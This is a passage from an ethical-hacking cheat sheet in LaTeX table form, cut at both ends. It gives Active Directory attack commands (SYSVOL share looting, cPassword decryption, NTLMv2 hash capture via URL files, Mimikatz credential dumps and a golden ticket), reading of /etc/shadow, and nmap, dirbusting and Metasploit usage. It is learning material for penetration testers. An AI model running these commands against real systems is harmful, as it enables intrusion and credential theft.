\textbackslash{}\textbackslash{}\textbackslash{}*{\emph{\$DC-IP}}{\emph{\textbackslash{}\textbackslash{}SYSVOL -{}-user GOLD.local/jsnow\%johnsnow`\{\{nl\}\}`\{\{lang-plaintext\}\}prompt off` \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}recurse on` \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}mget }}`} \tn % Row Count 32 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post Compromise Attacks (cont)}} \tn % Row 15 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Decrypting the cPassword obtained from `Groups.xml`} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}gpp-decrypt {\bf{\$cPassword}}`} \tn % Row Count 2 (+ 2) % Row 16 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Performing a URL File Attack to get more NTLMv2 hashes} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}create a file: `\{\{lang-plaintext\}\}@somefile.url` \textgreater{}\textgreater{} in the created file, put:\{\{nl\}\} `\{\{lang-plaintext\}\}{[}InternetShortcut{]}\{\{nl\}\}URL=someurl`} \tn % Row Count 7 (+ 5) % Row 17 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Performing the PrintNightmare Attack} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}\{\{popup="https://www.notion.so/PrintNightmare-CVE-2021-1675-71b727dba3ec4b92b1111624f2345337?pvs=4"\}\}External Link\{\{/popup\}\}} \tn % Row Count 11 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post Compromise Attacks -{}- Mimikatz}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{First things first} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}privilege::debug`} 
\tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Dump hashes of currently logged on users} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}sekurlsa::logonpasswords`} \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Dump SAM hashes} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}lsadump::lsa /patch`} \tn % Row Count 6 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Dump SAM hash of a specific account} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}lsadump::lsa /inject /name:krbtgt`} \tn % Row Count 9 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Golden Ticket Attack} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}kerberos::golden /user:{\bf{someuser}} /domain:GOLD.local\{\{\ \}\}/sid:{\bf{domainsid}} /id:500 /krbtgt:{\bf{NThash}}/ptt`} \tn % Row Count 13 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Useful Linux Commands}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To locate a file} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`updatedb\{\{nl\}\}locate FILE`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To clone a github repo} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`git clone REPO\_URL`} \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{For {\bf{command2}} to execute if and only if {\bf{command1}} execs successfully} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`COMMAND1 \&\& COMMAND2`} 
\tn % Row Count 7 (+ 3) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{For {\bf{command2}} to execute if and only if {\bf{command1}} fails to exec} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`COMMAND1 || COMMAND2`} \tn % Row Count 10 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Print a range of numbers from {\bf{start}} to {\bf{stop}} with {\bf{step}} increment} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`seq {[}START\_NO{]} {[}STEP{]} STOP\_NO`\{\{nl\}\}`seq 1 256`} \tn % Row Count 14 (+ 4) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To split a string into fields based on a delimiter (e.g space), and select the Nth field. Include {\bf{file}} if string is in a file and not stdin} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`"string to cut into six fields" | cut -d ' ' -f N` {[}FILE{]}} \tn % Row Count 19 (+ 5) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To list open ports on a system} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}netstat -lp} \tn % Row Count 21 (+ 2) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To kill a process on an open port (thus closing the port)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}kill {\bf{pid\_no}}} \tn % Row Count 24 (+ 3) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To zip a file/directory (-r for recursiveness)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}zip -r zippedfile.zip file-or-dir-to-zip`} \tn % Row Count 27 (+ 3) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To unzip a zipped file} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`unzip zippedfile.zip`} \tn % Row Count 29 (+ 2) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To list 
crontab for a user} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`crontab -u johndoe -l`} \tn % Row Count 31 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Useful Linux Commands (cont)}} \tn % Row 11 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To create a cronjob that echoes "nice" into a file every minute (more on cronjobs \{\{link="https://crontab.guru"\}\}here\{\{/link\}\}):} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`crontab -e` -{}-\textgreater{} `*/1 * * * * echo "nice" \textgreater{}\textgreater{} file.txt`} \tn % Row Count 5 (+ 5) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To find a {\emph{file}} under directory / with permission {\emph{4000}} (SUID bit set)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}find / -type f -perm -4000`} \tn % Row Count 8 (+ 3) % Row 13 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To set the SUID bit on a file or dir} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}chmod u+s` or `\{\{lang-plain\}\}chmod 4000`} \tn % Row Count 11 (+ 3) % Row 14 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To set the SGID bit on a file or dir} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}chmod g+s` or `\{\{lang-plain\}\}chmod 2000`} \tn % Row Count 14 (+ 3) % Row 15 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To set the sticky bit on a file or dir} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}chmod +t` or `\{\{lang-plain\}\}chmod 1000`} \tn % Row Count 17 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} 
\mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Network Commands}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To get IP info of network interfaces} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`ip a`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To list ARP neighbours (the neighbour cache)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`ip n` \{\{nl\}\} `arp -a`} \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To show the routing table, including the default gateway} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`ip r`} \tn % Row Count 6 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Users and Privileges}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To switch between users} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`su USERNAME`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To run a {\bf{command}} as {\bf{user}} without explicitly switching users} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`su USERNAME -c "COMMAND"`} \tn % Row Count 5 (+ 3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To list the sudo rules granted to the current user} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`sudo -l`} \tn % Row Count 8 (+ 3) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To open a root shell from a sudo-capable user} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`sudo su`} \tn % Row Count 11 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{For a persistent super user / root shell} \tn 
\mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`sudo -s`} \tn % Row Count 13 (+ 2) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To change the password for a {\bf{user}}} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`passwd USERNAME`} \tn % Row Count 15 (+ 2) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To add a new {\bf{user account}}} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`adduser USERNAME`} \tn % Row Count 17 (+ 2) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To view all user accounts (passwd) or the password hashes (shadow; readable only by root)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`cat /etc/passwd \{\{nl\}\}cat /etc/shadow`} \tn % Row Count 19 (+ 2) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To view all groups} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`cat /etc/group`} \tn % Row Count 21 (+ 2) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To view the sudo policy (sudoers; readable only by root, edit it with `visudo`)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`cat /etc/sudoers`} \tn % Row Count 23 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Linux Services}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To start, stop or restart a service} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`service SERVICE\_NAME start` \{\{nl\}\}`service SERVICE\_NAME stop` \{\{nl\}\} `service SERVICE\_NAME restart`} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To check the status of a service} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`service SERVICE\_NAME status`} \tn % Row Count 6 (+ 2) 
\hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{2.09034 cm} x{2.88666 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Stages of Ethical Hacking}} \tn % Row 0 \SetRowColor{LightBackground} information gathering & using tools like Wappalyzer, BuiltWith, breachparse \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} scanning and enumeration & using tools like nmap, dirb, nikto, nessus, sublist3r, amass \tn % Row Count 6 (+ 3) % Row 2 \SetRowColor{LightBackground} gaining access (exploitation) & using tools like searchsploit, exploit-db, metasploit, buffer overflows, bind/reverse shells \tn % Row Count 10 (+ 4) % Row 3 \SetRowColor{white} \seqsplit{post-exploitation} & using tools like pspy64, linpeas.sh, winpeas.sh or by doing a hashdump, \seqsplit{passwd/shadow/group/sudoers} file dumps, etc. \tn % Row Count 15 (+ 5) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Scanning and Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Port/Service Scanning/Discovery}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{enumerate all hosts discoverable on a subnet (ARP-based)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`netdiscover -r 10.10.10.0/24`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{nmap TCP half-open scan on all ports with OS/version detection, script scan and traceroute} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`nmap -T4 -sS -p- -A 10.10.10.10`} \tn % Row Count 5 (+ 
3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{nmap scan on range of IPs with only ping scan (port scan disabled)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`nmap -T4 -sn 10.10.10-124.0-255`} \tn % Row Count 8 (+ 3) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{nmap TCP half-open scan for select ports while skipping host discovery} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`nmap -T4 -sS -p1-1024 -A -Pn 10.10.10.0-255`} \tn % Row Count 11 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{-sT (for full TCP 3-way handshake scan)\{\{nl\}\}-sU (for UDP scan)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}other scan techniques in place of -sS} \tn % Row Count 14 (+ 3) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Nessus scan} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}service nessusd start` -{}-\textgreater{} `\{\{lang-plain\}\}https://kali:8834`} \tn % Row Count 17 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Nikto scan} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`nikto -host http://10.10.10.10`} \tn % Row Count 19 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{HTTP/S Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Website vuln scan with Nikto} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`nikto -host http://10.10.10.10`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{standard directory busting with dirb using default common.txt wordlist. -w ignores warnings. 
Use -r to disable recursion.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`dirb https://securesite.com -w`} \tn % Row Count 6 (+ 4) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Directory busting with dirb, specifying a wordlist and extensions to append to each word probed} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`dirb http://unsecuresite.com /path/to/wordlist -X .html,.php -w`} \tn % Row Count 10 (+ 4) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{standard directory busting with gobuster} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`gobuster dir -u https://somesite.com -w /path/to/word/list`} \tn % Row Count 13 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{directory busting with gobuster, specifying {\bf{threads}} and file extensions to append to words} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`gobuster dir -u http://somesite.com -w /path/to/word/list -t {\bf{threads}} -x .html,.php`} \tn % Row Count 17 (+ 4) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Enumeration of the tech stack of a website} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}whatweb https://www.example.com} \tn % Row Count 19 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Some wordlists to use:\{\{nl\}\} `/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`\{\{nl\}\}`/usr/.../dirbuster/directory-list-lowercase-2.3-medium.txt` \newline Other useful options for dirbusting with gobuster include: -c (to specify a cookie string), -a (to set the user agent).} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Domain Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} 
\mymulticolumn{1}{x{5.377cm}}{Sub-domain enumeration} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`sublist3r -d DOMAIN.COM`} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{discover domain names hosted on a server via virtual hosting (reverse lookup of an IP range against the server's nameserver)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}dnsrecon -n SERVER\_IP -r \seqsplit{LOCAL\_IP\_RANGE\_TO\_SEARCH\_FOR\_DOMAINS} \{\{nb\}\} dnsrecon -n 10.10.10.11 -r 127.0.0.0/24} \tn % Row Count 7 (+ 5) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{to add a discovered domain to the hosts file} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}edit /etc/hosts and add the mapping: `SERVER\_IP DOMAINNAME.COM`} \tn % Row Count 10 (+ 3) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To probe domains for http/s servers using tomnomnom's httprobe} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`cat domain-names.txt | httprobe`} \tn % Row Count 13 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{SMB Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{connect to SMB and list share names} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}smbclient -L \textbackslash{}\textbackslash{}\textbackslash{}\textbackslash{}192.168.219.133`} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{connect to an SMB share} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}smbclient \textbackslash{}\textbackslash{}\textbackslash{}\textbackslash{}192.168.219.133\textbackslash{}\textbackslash{}SHARENAME\$`} \tn % Row Count 6 (+ 3) % Row 2 \SetRowColor{LightBackground} 
\mymulticolumn{1}{x{5.377cm}}{Enumerate SMB with metasploit {\emph{auxiliary}} modules (run inside msfconsole)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}search smb auxiliary} \tn % Row Count 9 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{SSH Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{connecting to SSH on legacy systems. First try `ssh login@serverip` and add the options below one at a time only if the server rejects the defaults; they re-enable deprecated algorithms, so do not make them permanent} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}ssh username@10.10.10.10 \seqsplit{-oKexAlgorithms=+diffie-hellman-group-exchange-sha1} \seqsplit{-oHostKeyAlgorithms=+ssh-rsa} -c aes128-cbc} \tn % Row Count 6 (+ 6) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To connect using a private key (ssh refuses a key file that is readable by other users).} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}ssh -i id.rsa johndoe@10.0.0.1`} \tn % Row Count 8 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{NFS Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To mount the network file system on the local machine} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}mount 10.0.0.1:/srv/nfs /mnt`} \tn % Row Count 2 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{EXPLOITATION}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} 
\begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Metasploit}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Start metasploit. {[}Starting metasploit for the first time?{]}} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfconsole`. `\{\{lang-plain\}\}{[}msfdb init \&\& msfconsole{]}`} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To search for an {\bf{exploit}}} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}search {\bf{EXPLOIT\_NAME}}`} \tn % Row Count 6 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{After search, to select an exploit by its module path (or by its index number in the search results)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}use {\bf{module\_path}}`} \tn % Row Count 8 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To see the options for an exploit} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}options`} \tn % Row Count 10 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To set a value for an option} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}set {\bf{option\_name}} {\bf{value}}`} \tn % Row Count 12 (+ 2) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To run the exploit} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}run` or `\{\{lang-plain\}\}exploit`} \tn % Row Count 14 (+ 2) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Automate metasploit with resource scripts (`.rc` files)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfconsole -r FILE\_NAME.rc`} \tn % Row Count 17 (+ 3) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To get list of all 
